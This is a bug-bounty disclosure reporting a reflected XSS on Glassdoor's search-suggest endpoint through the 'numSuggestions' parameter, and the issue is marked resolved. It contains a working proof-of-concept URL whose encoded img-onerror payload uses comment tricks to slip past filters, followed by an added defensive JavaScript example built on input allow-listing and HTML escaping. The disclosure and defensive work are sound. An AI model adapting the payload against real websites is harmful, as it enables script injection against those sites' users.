Reflected XSS at https://www.glassdoor.com/ via the 'numSuggestions' parameter
Medium
Glassdoor
Reported by
l0cpd
Vulnerability Details
Technical details and impact analysis
Hi there,
I have found an XSS vulnerability at: https://www.glassdoor.com/ via the parameter: `numSuggestions`
**Summary:**
Affected Parameter: `numSuggestions`
**Browsers tested:** Firefox, Chrome, Edge (latest version)
## Steps To Reproduce:
Go to: `https://www.glassdoor.com/searchsuggest/typeahead?numSuggestions=8rk3s6%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60`
{F1092213}
## Supporting Material/References (screenshots, logs, videos):
{F1092214}
Regards,
@l0cpd
## Impact
The attacker can execute JS code.
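The defensive side of this report, as an added example that is not part of the original report and is not Glassdoor's code: a count parameter such as `numSuggestions` is parsed against a strict integer allow-list and never echoed back, the response is served as JSON with `nosniff`, and an HTML encoder is shown for cases where a value must be reflected. The function names, the 1 to 20 range and the response shape are assumptions; the request URL used in the test is the one from the report.

```javascript
// Added example: hypothetical handler logic, not the vendor's implementation.
const MAX_SUGGESTIONS = 20; // assumed upper bound for the count parameter

// Allow-list parse: one or two ASCII digits, within the accepted range.
// Anything else (including "8rk3s6\"<img ...") yields null.
function parseNumSuggestions(raw) {
  if (typeof raw !== "string" || !/^[0-9]{1,2}$/.test(raw)) return null;
  const n = Number(raw);
  return n >= 1 && n <= MAX_SUGGESTIONS ? n : null;
}

// HTML encoding for values that must be reflected into markup.
const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (c) => HTML_ENTITIES[c]);
}

// Builds the response for a typeahead request. The raw parameter is never
// copied into the body, and the content type stops browsers from rendering
// the response as HTML.
function handleTypeahead(requestUrl) {
  const params = new URL(requestUrl).searchParams;
  const n = parseNumSuggestions(params.get("numSuggestions"));
  const headers = {
    "Content-Type": "application/json; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
  };
  if (n === null) {
    const error = `numSuggestions must be an integer from 1 to ${MAX_SUGGESTIONS}`;
    return { status: 400, headers, body: JSON.stringify({ error }) };
  }
  // Suggestion lookup is out of scope here; an empty list stands in for it.
  return { status: 200, headers, body: JSON.stringify({ numSuggestions: n, suggestions: [] }) };
}
```
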
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-site Scripting (XSS) - Reflected